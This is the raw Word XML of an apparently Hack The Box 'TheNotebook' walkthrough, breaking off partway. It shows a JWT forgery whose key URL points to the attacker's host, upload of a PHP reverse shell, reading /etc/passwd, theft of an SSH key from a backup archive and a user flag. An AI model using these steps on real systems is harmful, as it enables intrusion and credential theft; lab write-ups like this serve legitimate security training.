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BD4" w:rsidRDefault="00C87BD4" w:rsidP="00C87BD4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8F252B" w:rsidRDefault="00C87BD4" w:rsidP="00C87BD4">
      <w:r>
        <w:t xml:space="preserve">└─#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-v -A 10.10.10.230</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C87BD4" w:rsidRDefault="0052562C" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FB5EA90" wp14:editId="2820AB24">
            <wp:extent cx="5943600" cy="2350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2C" w:rsidRDefault="0052562C" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="0052562C" w:rsidRDefault="001836BC" w:rsidP="00C87BD4">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="000F5055">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.10.230/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001836BC" w:rsidRDefault="008E1E45" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="386E1EFB" wp14:editId="46A914CB">
            <wp:extent cx="5943600" cy="2190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45" w:rsidRDefault="008E1E45" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="008E1E45" w:rsidRDefault="00726F6D" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75292CEA" wp14:editId="619FF0B0">
            <wp:extent cx="5943600" cy="3251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6D" w:rsidRDefault="007F56FA" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39E26F75" wp14:editId="38B71A81">
            <wp:extent cx="5943600" cy="1503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6FA" w:rsidRDefault="007F56FA" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="00401B3E" w:rsidRDefault="00401B3E" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="00401B3E" w:rsidRDefault="005444C6" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49149C7A" wp14:editId="5953F4C3">
            <wp:extent cx="5943600" cy="2942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C6" w:rsidRDefault="005444C6" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="005444C6" w:rsidRDefault="005455D3" w:rsidP="00C87BD4">
      <w:r w:rsidRPr="005455D3">
        <w:t>auth:"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6InRlc3QxIiwiZW1haWwiOiJ0ZXN0MUBnbWFpbC5jb20iLCJhZG1pbl9jYXAiOjB9.SeOcTxl2DhAAWm_u78yBL_fXN_a_fcd6-mbExtJGgNl-QSNJNoVjqvA7lmPZWkM255svv7vy9PYrt1faUhx4CWZ_jAMwQ8RM0D-YO3Y4fQ5P6Lm3V6j3nLMsQ-otx39GMQf9OZDZk6-Gz__8Bl_fqP-vGnd-pOIqehdw5d_Lwcq885B1vTZR9ZytBev4QzdPy3bXrEVY4yFKwwZRP2wLfAfPLjxc5VJupGLxNEJUwhcsBLGKMyMAln5Jwu0vNbwqMnOR4WoOrcaIztv0ebGqAP4oq0iGpNfkQiv0Ur9zMNMuRGz_c9S579OIqdnHQV47mj5n4k4oKxRLPP6R0CUTNNyz1KQAkolcfaxzByrW8Dbefpg05LqsxMbZvJtF3qtR0do6ldojq6I4sQ4ePoAO0QVfK_1JIkN3x1oyHWN8sp5AHhnDz0gePSU_k_Au5eNxaLEr6XvrDbprLM7wIMZtTtoQwl_7ImPT1a5te4bJJvOFeXx36e-heNOWQCI6HOXd0QFYJ8Hyd34cRgYca_Io5dRCMbVbX8dRWjaFbKGC05zB1hWPqZOa5MzASQ4AZhOGt8M0VkPUGw8PPOcPar_pSmQ_YazOHQx0DUciztn7DA_dAwwmKoVzIzvyYJpkUavRfVs2jOIx5cX36zYQeL_AFxrg-HlX_BUUILtcFQhgL-g"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE5BB6" w:rsidRDefault="00AE5BB6" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="00AE5BB6" w:rsidRDefault="00AE5BB6" w:rsidP="00C87BD4">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="000F5055">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://jwt.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AE5BB6" w:rsidRDefault="00B322A3" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DC11147" wp14:editId="4196FEAA">
            <wp:extent cx="5943600" cy="34016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A3" w:rsidRDefault="00B322A3" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="00B87F2E" w:rsidRDefault="00B87F2E" w:rsidP="00B87F2E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B87F2E" w:rsidRDefault="00B87F2E" w:rsidP="00B87F2E">
      <w:r>
        <w:t xml:space="preserve">└─#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genrsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -out </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privKey.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2048</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B87F2E" w:rsidRDefault="00A23D54" w:rsidP="00B87F2E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A192ABB" wp14:editId="41893AD8">
            <wp:extent cx="5943600" cy="4298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124" w:rsidRDefault="00803124" w:rsidP="00803124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A23D54" w:rsidRDefault="00803124" w:rsidP="00803124">
      <w:r>
        <w:t xml:space="preserve">└─# python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 8081</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00803124" w:rsidRDefault="00803124" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6494A992" wp14:editId="3FCD2265">
            <wp:extent cx="3209925" cy="657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C3" w:rsidRDefault="00AC04C3" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="0048261A" w:rsidRDefault="0048261A" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CB0562E" wp14:editId="045306C5">
            <wp:extent cx="5391150" cy="457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94" w:rsidRDefault="00376A94" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="00B322A3" w:rsidRDefault="00517DDD" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4632F4BD" wp14:editId="7A29F10C">
            <wp:extent cx="4695825" cy="2971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30" w:rsidRDefault="00517DDD" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADF22DF" wp14:editId="3AE753CF">
            <wp:extent cx="4057650" cy="3467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DD" w:rsidRDefault="00517DDD" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="00517DDD" w:rsidRDefault="00517DDD" w:rsidP="00C87BD4">
      <w:r>
        <w:t>And we get the final JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00517DDD" w:rsidRDefault="007978D0" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6450305B" wp14:editId="6E011471">
            <wp:extent cx="4314825" cy="4924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D0" w:rsidRDefault="007978D0" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="007978D0" w:rsidRDefault="00703E58" w:rsidP="00C87BD4">
      <w:r>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
      <w:r w:rsidR="00204341">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00703E58">
        <w:t>yJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC4xMzA6ODA4MS9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6InRlc3QxIiwiZW1haWwiOiJ0ZXN0MUBnbWFpbC5jb20iLCJhZG1pbl9jYXAiOjF9.rXXRDvqR2nOsf6prd0-swSgJuA70NmxK9jtiZ2fz_6m9EFAZKtZDjPHqlQAZe0NqNP2JjFF_0ZP9roYAArVvRAdofnMkVCNb3GYAABqcAB5b4EL6ndgetHVW-1sQdLSi6JSuS5hdBZ20dNJ62_dH3hyjOMkwXzEM9CQVFzXT4Ffwr_rnF3UQriD1ToqVL7fP-TvLYnY3X2gylpIj8Ukbc1KDBw71N6i2A1rbNgsl0D1XsQwXVa1niONCLeV7GB1dWIq4edoabU4TNGhXpohMW-uoJBBwRCdS14uJb6OXvIgD3hpxHgU3rmMOzXPIoDQoMXS8YQB3b5IoNWeDqsA1JA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204341" w:rsidRDefault="00204341" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="00204341" w:rsidRDefault="00204341" w:rsidP="00C87BD4">
      <w:r>
        <w:t>Now on browser replace the JWT value with new and refresh the page we can able to see admin panel on screen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204341" w:rsidRDefault="00DB7923" w:rsidP="00C87BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24A001B2" wp14:editId="0F8E017F">
            <wp:extent cx="5943600" cy="31108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23" w:rsidRDefault="00DB7923" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="00E841E0" w:rsidRDefault="00E841E0" w:rsidP="00E841E0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DB7923" w:rsidRDefault="00E841E0" w:rsidP="00E841E0">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E841E0" w:rsidRDefault="00AF7F6A" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5907FBF7" wp14:editId="614B0949">
            <wp:extent cx="5200650" cy="485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6A" w:rsidRDefault="00AF7F6A" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00AF7F6A" w:rsidRDefault="00BF5785" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="777054A2" wp14:editId="08AC6589">
            <wp:extent cx="5229225" cy="16383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85" w:rsidRDefault="003D3D4E" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D45521E" wp14:editId="3A6574CD">
            <wp:extent cx="5943600" cy="17386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4E" w:rsidRDefault="003D3D4E" w:rsidP="00E841E0"/>
    <w:p w:rsidR="003D3D4E" w:rsidRDefault="00EB5223" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13D51AA5" wp14:editId="390BEA15">
            <wp:extent cx="5943600" cy="1851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23" w:rsidRDefault="001F7BDB" w:rsidP="00E841E0">
      <w:r>
        <w:t>Click on view button and we get the shell…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F7BDB" w:rsidRDefault="001F7BDB" w:rsidP="00E841E0"/>
    <w:p w:rsidR="001F7BDB" w:rsidRDefault="00ED70AF" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BFB7C2A" wp14:editId="605C6727">
            <wp:extent cx="5943600" cy="10407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AF" w:rsidRDefault="00ED70AF" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00ED70AF" w:rsidRDefault="003E4604" w:rsidP="00E841E0">
      <w:r w:rsidRPr="003E4604">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E4604">
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="003E4604" w:rsidRDefault="0022225E" w:rsidP="00E841E0">
      <w:r w:rsidRPr="0022225E">
        <w:t>$ SHELL=/bin/bash script -q /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022225E" w:rsidRDefault="0081065E" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33CF0B55" wp14:editId="70EFA463">
            <wp:extent cx="4200525" cy="762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5E" w:rsidRDefault="0081065E" w:rsidP="00E841E0"/>
    <w:p w:rsidR="002E5207" w:rsidRDefault="002E5207" w:rsidP="00E841E0">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E5207">
        <w:t>www-data@thenotebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E5207">
        <w:t>:/$ cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E5207">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E5207">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E5207">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E5207">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E5207">
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E5207">
        <w:t xml:space="preserve"> bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E5207" w:rsidRDefault="00452D75" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="340F5308" wp14:editId="07B41055">
            <wp:extent cx="4048125" cy="800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75" w:rsidRDefault="00452D75" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00452D75" w:rsidRDefault="006F164E" w:rsidP="00E841E0">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F164E">
        <w:t>www-data@thenotebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F164E">
        <w:t>:/$ cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F164E">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F164E">
        <w:t>/backups</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F164E" w:rsidRDefault="00CC3656" w:rsidP="00E841E0">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC3656">
        <w:t>www-data@thenotebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC3656">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC3656">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC3656">
        <w:t xml:space="preserve">/backups$ ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3656">
        <w:t>la</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC3656" w:rsidRDefault="003A256D" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71AFF6B0" wp14:editId="2B2A1A2A">
            <wp:extent cx="5667375" cy="32861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6D" w:rsidRDefault="00AD7F36" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2877D69C" wp14:editId="6E972D32">
            <wp:extent cx="3857625" cy="4667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6" w:rsidRDefault="00DE2033" w:rsidP="00E841E0">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE2033">
        <w:t>www-data@thenotebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE2033">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE2033">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE2033">
        <w:t xml:space="preserve">/backups$ python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE2033">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE2033">
        <w:t xml:space="preserve"> 8082</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6787F" w:rsidRDefault="00045E70" w:rsidP="00E841E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6976153"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4867275" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="9525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87F" w:rsidRDefault="00D6787F" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00D6787F" w:rsidRDefault="00D6787F" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00D6787F" w:rsidRDefault="00D6787F" w:rsidP="00D6787F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D6787F" w:rsidRDefault="00D6787F" w:rsidP="00D6787F">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http://10.10.10.230:8082/home.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE2033" w:rsidRDefault="00D6787F" w:rsidP="00E841E0">
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00045E70" w:rsidRDefault="00A81C2E" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1089C867" wp14:editId="50296234">
            <wp:extent cx="5943600" cy="1366463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7620" cy="137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2E" w:rsidRDefault="00A81C2E" w:rsidP="00E841E0"/>
    <w:p w:rsidR="005714AF" w:rsidRDefault="005714AF" w:rsidP="005714AF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5714AF" w:rsidRDefault="005714AF" w:rsidP="005714AF">
      <w:r>
        <w:t>└─# tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xzvf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="000F5055">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>home.tar.gz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005714AF" w:rsidRDefault="008B1DAE" w:rsidP="005714AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5292DCAE" wp14:editId="24F91AF3">
            <wp:extent cx="3181350" cy="2419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AE" w:rsidRDefault="00BB2506" w:rsidP="005714AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0208E366" wp14:editId="21F17253">
            <wp:extent cx="4381500" cy="2286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06" w:rsidRDefault="00BB2506" w:rsidP="005714AF"/>
    <w:p w:rsidR="00BB2506" w:rsidRDefault="00243182" w:rsidP="005714AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E976339" wp14:editId="57F535FE">
            <wp:extent cx="4581525" cy="18288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82" w:rsidRDefault="00243182" w:rsidP="005714AF"/>
    <w:p w:rsidR="001040DF" w:rsidRDefault="001040DF" w:rsidP="001040DF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kali)-[/home/…/Downloads/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>noah</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00243182" w:rsidRDefault="001040DF" w:rsidP="001040DF">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> noah@10.10.10.230 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001040DF" w:rsidRDefault="007D70C2" w:rsidP="001040DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B44EDAE" wp14:editId="0B5B23EC">
            <wp:extent cx="5943600" cy="30956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C2" w:rsidRDefault="007D70C2" w:rsidP="001040DF"/>
    <w:p w:rsidR="007D70C2" w:rsidRDefault="00246BF9" w:rsidP="001040DF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246BF9">
        <w:t>noah@thenotebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246BF9">
        <w:t>:~$ id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00246BF9" w:rsidRDefault="00415E0C" w:rsidP="001040DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A6A44AE" wp14:editId="1C77A000">
            <wp:extent cx="3714750" cy="600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E0C" w:rsidRDefault="00415E0C" w:rsidP="001040DF"/>
    <w:p w:rsidR="00415E0C" w:rsidRDefault="004600D7" w:rsidP="001040DF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004600D7">
        <w:t>noah@thenotebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004600D7">
        <w:t xml:space="preserve">:~$ ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="004600D7">
        <w:t>la</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004600D7" w:rsidRDefault="00712FC3" w:rsidP="001040DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BF42EFD" wp14:editId="1BF3C8FF">
            <wp:extent cx="5400675" cy="22574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C3" w:rsidRDefault="005D076D" w:rsidP="001040DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2790FC04" wp14:editId="524F4D88">
            <wp:extent cx="2619375" cy="3714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6D" w:rsidRDefault="00EC4550" w:rsidP="001040DF">
      <w:r>
        <w:t xml:space="preserve">User.txt: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4550">
        <w:t>b1597141d6ab0bb4ef697e377de530bf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4550" w:rsidRDefault="00077E9F" w:rsidP="001040DF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00077E9F">
        <w:t>noah@thenotebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00077E9F">
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00077E9F">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00077E9F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00077E9F">
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00077E9F" w:rsidRDefault="002E2C21" w:rsidP="001040DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73FF7DEC" wp14:editId="5F87D627">
            <wp:extent cx="5943600" cy="7435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21" w:rsidRDefault="002E2C21" w:rsidP="001040DF"/>
    <w:p w:rsidR="00C26F3D" w:rsidRDefault="00C26F3D" w:rsidP="001040DF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C26F3D">
        <w:t>noah@thenotebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C26F3D">
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C26F3D">
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C26F3D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
